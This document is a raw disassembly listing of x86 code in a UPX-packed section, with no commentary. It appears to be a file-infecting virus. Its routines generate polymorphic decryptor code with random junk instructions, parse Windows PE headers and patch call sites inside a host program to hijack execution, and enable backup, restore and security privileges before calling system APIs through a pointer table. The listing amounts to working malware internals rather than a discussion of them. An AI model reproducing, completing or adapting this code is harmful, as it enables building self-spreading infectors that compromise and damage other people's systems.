dd 10A61429h, 40375232h, 40375248h, 8F908788h, 27B1FAE5h
dd 0C26CCC5Ch, 86E15194h, 658000B9h, 0D8B8B352h, 15h dup(0)
dd 0C768988Fh, 0F4A58360h, 1042h, 42F8A583h, 0F000010h
; CODE XREF: UPX2:3150CF2A�p
; UPX2:3150CF51�p ...
dd 8D1443B7h, 0B70F1853h, 0D003064Bh, 2424448Bh, 720C422Bh
dd 8423B19h, 428B1473h, 0C422B14h, 42F49589h, 85890010h
dd 1042F8h, 0C28305EBh, 61D9E228h, 880004C2h, 10246785h
dd 64E800h, 1F680000h, 8D000000h, 10239485h, 18395900h
dd 0C0830C74h, 0FFF7E204h, 1042D085h, 0D9F7C300h, 24678D03h
dd 10E30010h, 8FFC70FFh, 4E88300h, 9D89F6E2h, 102394h
dd 74003A83h, 3322B05h, 4E8D1072h, 5E5B58FCh, 74003A83h
dd 0EB32FF04h, 1072FF03h, 0FFFF57E8h, 2BCE2BFFh, 1042F88Dh
dd 4B035800h, 858FC334h, 1042D4h, 42D085C7h, 10h, 3CE80000h
dd 8B000000h, 1042D085h, 0F6A9E800h, 18E8FFFFh, 83000000h
dd 1042D0BDh, 8750000h, 24109D89h, 9CEB0010h, 42D08DFFh
dd 8FC30010h, 1042D485h, 0D0958900h, 0E8001042h, 3, 8BC3C933h
dd 8093h, 0EDE85200h, 3FFFFFEh, 1042F895h, 83D60300h, 0F000C7Ah
dd 10784h, 107A8300h, 0FD840F00h, 8B000000h, 0E8500C42h
dd 0FFFFFEC8h, 42F88503h, 0C6030010h, 80088A50h, 197400F9h
dd 742EF980h, 0F1EB4003h, 8101488Bh, 0DFDFDFE1h, 44F981DFh
dd 75004C4Ch, 0C82B59ECh, 0FFAF983h, 0B78Fh, 78816600h
dd 0F3233FEh, 0AB85h, 3A835600h, 8B057500h, 2EB104Ah, 0F1030A8Bh
dd 0FE72E851h, 0B503FFFFh, 1042F8h, 78C085ADh, 84840FFBh
dd 0FF000000h, 1042F8B5h, 55E85000h, 3FFFFFEh, 1042F885h
dd 0F8858F00h, 3001042h, 83532404h, 0DB3302C0h, 0E308B60Fh
dd 20C98012h, 2424C153h, 241C2904h, 5B240C29h, 81E9EB40h
dd 0BBD70FFBh, 813E74DDh, 6E45A8FBh, 813674DBh, 0A13B59FBh
dd 812E74FFh, 0B522D6FBh, 812674ACh, 58E993FBh, 811E74F3h
dd 58E97DFBh, 811674F3h, 253F46FBh, 810E74E1h, 253F30FBh
dd 0FF0674E1h, 1042D495h, 71E95B00h, 5EFFFFFFh, 0E914C283h
dd 0FFFFFEEFh, 46A03C3h, 0F549E858h, 9588FFFFh, 102641h
dd 1831B866h, 0E4C0E202h, 66E20203h, 58066AABh, 0FFF52EE8h
dd 8C283FFh, 56AD187h, 0F521E858h, 0FA80FFFFh, 0B00B7303h
dd 41850250h, 0AA001026h, 686A27EBh, 0FA80AA58h, 0B0187503h
dd 0F501E811h, 1B8FFFFh, 84000000h, 0D10D74D2h, 0EBCAFEE0h
dd 0B805EBF6h, 80000000h, 0C3BFE2ABh, 39CC958Dh, 0D72B0010h
dd 0F7C3DAF7h, 1039C085h, 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_3150C6D6
or ax, 2589h
jmp short loc_3150C6E9
; ---------------------------------------------------------------------------
loc_3150C6D6: ; CODE XREF: UPX2:3150C6CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_3150C6E5
or ax, 2531h
jmp short loc_3150C6E9
; ---------------------------------------------------------------------------
loc_3150C6E5: ; CODE XREF: UPX2:3150C6DD�j
or ax, 2501h
loc_3150C6E9: ; CODE XREF: UPX2:3150C6D4�j
; UPX2:3150C6E3�j
stosw
call near ptr dword_3150C410+29Ch
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_3150C6FB proc near ; CODE XREF: UPX2:3150CD47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_3150C410+29Ch
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_3150C723
rdtsc
jmp short loc_3150C725
; ---------------------------------------------------------------------------
loc_3150C723: ; CODE XREF: sub_3150C6FB+22�j
sub eax, eax
loc_3150C725: ; CODE XREF: sub_3150C6FB+26�j
stosd
retn
sub_3150C6FB endp
; =============== S U B R O U T I N E =======================================
sub_3150C727 proc near ; CODE XREF: UPX2:loc_3150CD51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3150C75A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3150C76C
; ---------------------------------------------------------------------------
loc_3150C75A: ; CODE XREF: sub_3150C727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_3150C76C: ; CODE XREF: sub_3150C727+31�j
retn
sub_3150C727 endp
; =============== S U B R O U T I N E =======================================
sub_3150C76D proc near ; CODE XREF: sub_3150C7DF:loc_3150C806�p
; sub_3150C7DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3150C79B
; ---------------------------------------------------------------------------
loc_3150C776: ; CODE XREF: sub_3150C76D+44�j
mov al, 0FCh
jmp short loc_3150C79A
; ---------------------------------------------------------------------------
loc_3150C77A: ; CODE XREF: sub_3150C76D+48�j
mov ax, 0EBh
stosw
jmp short loc_3150C79B
; ---------------------------------------------------------------------------
loc_3150C782: ; CODE XREF: sub_3150C76D+4C�j
push 4
pop eax
call near ptr dword_3150BB50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3150C79B
; ---------------------------------------------------------------------------
loc_3150C798: ; CODE XREF: sub_3150C76D+50�j
mov al, 90h
loc_3150C79A: ; CODE XREF: sub_3150C76D+B�j
; sub_3150C76D+60�j ...
stosb
loc_3150C79B: ; CODE XREF: sub_3150C76D+7�j
; sub_3150C76D+13�j ...
push 1Bh
pop eax
call near ptr dword_3150BB50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_3150C7DE
test dl, dl
jz short loc_3150C776
dec dl
jz short loc_3150C77A
dec dl
jz short loc_3150C782
dec dl
jz short loc_3150C798
dec dl
jz short loc_3150C7CF
dec dl
jz short loc_3150C7D6
dec dl
jz short loc_3150C7DA
mov al, 0F9h
jmp short loc_3150C79A
; ---------------------------------------------------------------------------
loc_3150C7CF: ; CODE XREF: sub_3150C76D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3150C79A
; ---------------------------------------------------------------------------
loc_3150C7D6: ; CODE XREF: sub_3150C76D+58�j
mov al, 0F5h
jmp short loc_3150C79A
; ---------------------------------------------------------------------------
loc_3150C7DA: ; CODE XREF: sub_3150C76D+5C�j
mov al, 0F8h
jmp short loc_3150C79A
; ---------------------------------------------------------------------------
locret_3150C7DE: ; CODE XREF: sub_3150C76D+40�j
retn
sub_3150C76D endp
; =============== S U B R O U T I N E =======================================
sub_3150C7DF proc near ; CODE XREF: UPX2:loc_3150CC28�p
; UPX2:3150CDDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_3150C7EF
add al, 4
loc_3150C7EF: ; CODE XREF: sub_3150C7DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_3150C806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150C806: ; CODE XREF: sub_3150C7DF+1E�j
call sub_3150C76D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_3150C81D
mov ah, 29h
loc_3150C81D: ; CODE XREF: sub_3150C7DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_3150C76D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_3150C840
mov al, 86h
loc_3150C840: ; CODE XREF: sub_3150C7DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_3150C854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_3150C854: ; CODE XREF: sub_3150C7DF+6C�j
retn
sub_3150C7DF endp
; ---------------------------------------------------------------------------
loc_3150C855: ; CODE XREF: sub_3150D45B+183�p
lea edi, [ebp+1039CCh]
call sub_3150C76D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_3150C86F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3150C86F db 0F7h ; ; CODE XREF: UPX2:3150C86A�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_3150CB00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_3150CB00: ; CODE XREF: UPX2:3150CAF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_3150CB17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_3150CB54
; ---------------------------------------------------------------------------
loc_3150CB17: ; CODE XREF: UPX2:3150CB0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_3150CB29
mov al, 29h
loc_3150CB29: ; CODE XREF: UPX2:3150CB25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_3150CB4C
mov ah, 0C8h
loc_3150CB4C: ; CODE XREF: UPX2:3150CB48�j
or ah, [ebp+1039B9h]
stosw
loc_3150CB54: ; CODE XREF: UPX2:3150CB15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_3150CBDD
call sub_3150C76D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_3150CB88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_3150CBD5
; ---------------------------------------------------------------------------
loc_3150CB88: ; CODE XREF: UPX2:3150CB7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_3150CBA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_3150CBBA
; ---------------------------------------------------------------------------
loc_3150CBA5: ; CODE XREF: UPX2:3150CB92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_3150CBBA: ; CODE XREF: UPX2:3150CBA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_3150CBCD
add ah, 8
loc_3150CBCD: ; CODE XREF: UPX2:3150CBC8�j
or ah, [ebp+1039BAh]
stosw
loc_3150CBD5: ; CODE XREF: UPX2:3150CB86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_3150CBDD: ; CODE XREF: UPX2:3150CB6A�j
call sub_3150C76D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_3150CBFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_3150C76D
loc_3150CBFC: ; CODE XREF: UPX2:3150CBEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3150CC28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_3150CC2D
; ---------------------------------------------------------------------------
loc_3150CC28: ; CODE XREF: UPX2:3150CC0F�j
call sub_3150C7DF
loc_3150CC2D: ; CODE XREF: UPX2:3150CC26�j
call sub_3150C76D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_3150CC49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_3150CC58
; ---------------------------------------------------------------------------
loc_3150CC49: ; CODE XREF: UPX2:3150CC3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_3150CC58: ; CODE XREF: UPX2:3150CC47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3150CC93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3150CC8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3150CC92
; ---------------------------------------------------------------------------
loc_3150CC8A: ; CODE XREF: UPX2:3150CC6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_3150CC92: ; CODE XREF: UPX2:3150CC88�j
stosb
loc_3150CC93: ; CODE XREF: UPX2:3150CC62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_3150CCAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_3150CCB7
; ---------------------------------------------------------------------------
loc_3150CCAF: ; CODE XREF: UPX2:3150CC9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_3150CCB7: ; CODE XREF: UPX2:3150CCAD�j
stosb
call sub_3150C76D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_3150CCF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_3150CD0B
mov cl, 77h
jmp short loc_3150CD0B
; ---------------------------------------------------------------------------
loc_3150CCF0: ; CODE XREF: UPX2:3150CCC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_3150CD0B: ; CODE XREF: UPX2:3150CCEA�j
; UPX2:3150CCEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_3150C76D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3150CD5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_3150CD5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_3150CD51
call sub_3150C6FB
call sub_3150C76D
loc_3150CD51: ; CODE XREF: UPX2:3150CD45�j
call sub_3150C727
call sub_3150C76D
loc_3150CD5B: ; CODE XREF: UPX2:3150CD2D�j
; UPX2:3150CD39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3150CD6F
mov al, 0C9h
stosb
call sub_3150C76D
loc_3150CD6F: ; CODE XREF: UPX2:3150CD65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3150CDA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_3150C76D
mov al, 61h
stosb
call sub_3150C76D
loc_3150CDA5: ; CODE XREF: UPX2:3150CD79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_3150C76D
test dword ptr [ebp+1039C0h], 20h
jz short loc_3150CE31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3150CDED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_3150C7DF
call sub_3150C76D
mov al, 0C3h
stosb
call sub_3150C76D
loc_3150CDED: ; CODE XREF: UPX2:3150CDCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_3150C76D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_3150CE20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_3150CE2A
; ---------------------------------------------------------------------------
loc_3150CE20: ; CODE XREF: UPX2:3150CE12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_3150CE2A: ; CODE XREF: UPX2:3150CE1E�j
stosw
call sub_3150C76D
loc_3150CE31: ; CODE XREF: UPX2:3150CDC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3150CE9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_3150CE66
lea eax, [ebp+1039B8h]
loc_3150CE5E: ; CODE XREF: UPX2:3150CE64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3150CE5E
loc_3150CE66: ; CODE XREF: UPX2:3150CE56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3150CE7B
mov ax, 0C031h
stosw
loc_3150CE7B: ; CODE XREF: UPX2:3150CE73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3150CE94
mov ax, 0C031h
stosw
loc_3150CE94: ; CODE XREF: UPX2:3150CE8C�j
mov al, 0C3h
stosb
call sub_3150C76D
loc_3150CE9C: ; CODE XREF: UPX2:3150CE3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3150CEB4
push edi
sub edi, eax
pop eax
jmp short loc_3150CECD
; ---------------------------------------------------------------------------
loc_3150CEB4: ; CODE XREF: UPX2:3150CEAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3150CECD: ; CODE XREF: UPX2:3150CEB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3150CEED
neg eax
loc_3150CEED: ; CODE XREF: UPX2:3150CEE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3150CEF1 proc near ; CODE XREF: sub_3150D45B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_3150D0D9
call near ptr loc_3150CF11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3150CF11: ; CODE XREF: sub_3150CEF1+F�p
add bh, bh
sub_3150CEF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call near ptr dword_3150C410+4
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call near ptr dword_3150C410+4
mov edi, [ebp+1042F4h]
push esi
call near ptr dword_3150C410+4
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3150D0D9
jz loc_3150D0D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_3150D0AA
loc_3150CF8B: ; CODE XREF: sub_3150D0AA+29�j
lodsb
cmp al, 0E8h
jnz loc_3150D036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_3150C410+4
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_3150CFB9
cmp eax, [edi+0Ch]
jnb loc_3150D0D2
jmp short loc_3150CFC5
; ---------------------------------------------------------------------------
loc_3150CFB9: ; CODE XREF: sub_3150D0AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_3150D0D2
loc_3150CFC5: ; CODE XREF: sub_3150D0AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_3150D0D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_3150C410+4
cmp [ebp+1042F4h], edi
jnz loc_3150D0D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3150D0D2
cmp eax, [edi+8]
jnb loc_3150D0D2
loc_3150D00E: ; CODE XREF: sub_3150D0AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_3150D0E8
jmp loc_3150D0D2
; ---------------------------------------------------------------------------
loc_3150D036: ; CODE XREF: sub_3150D0AA-11C�j
cmp al, 0FFh
jnz loc_3150D0D2
cmp byte ptr [esi], 15h
jnz loc_3150D0D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_3150C410+4
cmp [ebp+1042F4h], edi
jnz short loc_3150D0D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3150D07F
cmp eax, [ebp+10431Ch]
jb short loc_3150D0E8
loc_3150D07F: ; CODE XREF: sub_3150D0AA-35�j
cmp eax, 70000000h
jb short loc_3150D0BD
call sub_3150D0AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_3150D0A9
add esp, 10h
push dword ptr [ecx]
pop [esp-8+arg_20]
popa
jmp short loc_3150D0C4
; ---------------------------------------------------------------------------
locret_3150D0A9: ; CODE XREF: sub_3150D0AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3150D0AA
; =============== S U B R O U T I N E =======================================
sub_3150D0AA proc near ; CODE XREF: sub_3150D0AA-24�p
var_10 = dword ptr -10h
arg_20 = dword ptr 24h
; FUNCTION CHUNK AT 3150CF8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_3150C410+10Bh
popa
loc_3150D0BD: ; CODE XREF: sub_3150D0AA-26�j
test eax, 80000000h
jnz short loc_3150D0D2
loc_3150D0C4: ; CODE XREF: sub_3150D0AA-3�j
sub eax, [edi+0Ch]
jb short loc_3150D0D2
cmp eax, [edi+8]
jb loc_3150D00E
loc_3150D0D2: ; CODE XREF: sub_3150D0AA-F9�j
; sub_3150D0AA-EB�j ...
dec ecx
jnz loc_3150CF8B
loc_3150D0D9: ; CODE XREF: sub_3150CEF1+9�j
; UPX2:3150CF73�j ...
mov edi, [esp+0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3150D12A
; ---------------------------------------------------------------------------
loc_3150D0E8: ; CODE XREF: sub_3150D0AA-7F�j
; sub_3150D0AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+10h+var_10]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3150D12A: ; CODE XREF: sub_3150D0AA+3C�j
pop edi
pop esi
retn
sub_3150D0AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150D12D proc near ; CODE XREF: UPX2:3150D42E�p
; FUNCTION CHUNK AT 3150D257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_3150D257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_3150D257
call sub_3150B5AF
call near ptr loc_3150D168+5
push ebx
db 65h
jz short near ptr unk_3150D1A6
imul ebp, [ebp+53h], 72756365h
loc_3150D168: ; CODE XREF: sub_3150D12D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_3150D12D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3150D19C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_3150D203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3150D19C: ; CODE XREF: UPX2:3150D17F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_3150D1A6 db 0 ; CODE XREF: sub_3150D12D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_3150D203: ; CODE XREF: UPX2:3150D18D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_3150D12D
loc_3150D257: ; CODE XREF: sub_3150D12D+A�j
; sub_3150D12D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3150D12D
; =============== S U B R O U T I N E =======================================
sub_3150D259 proc near ; CODE XREF: UPX2:3150D427�p
